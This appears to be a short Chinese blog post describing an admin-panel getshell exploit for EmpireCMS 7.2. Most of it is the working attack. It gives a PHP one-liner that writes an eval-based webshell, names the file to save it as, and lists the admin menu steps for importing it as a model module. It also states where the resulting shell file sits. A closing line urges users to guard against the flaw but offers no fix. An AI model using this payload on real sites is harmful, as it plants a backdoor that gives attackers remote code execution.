帝国cms7.2后台getshell漏洞

作者:彼岸花开 | 创建时间: 2023-06-12
帝国cms7.2后台getshell漏洞...
帝国cms7.2后台getshell漏洞

操作方法

php一句话内容: <?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?> 保存为1.php.mod 进入后台---系统设置---管理数据表---管理系统模型---导入新型模块 导入之后马儿就躺在了/e/admin/cao.php。

所以大家用帝国cms的要防范这个漏洞,纯属干货分享。

点击展开全文

更多推荐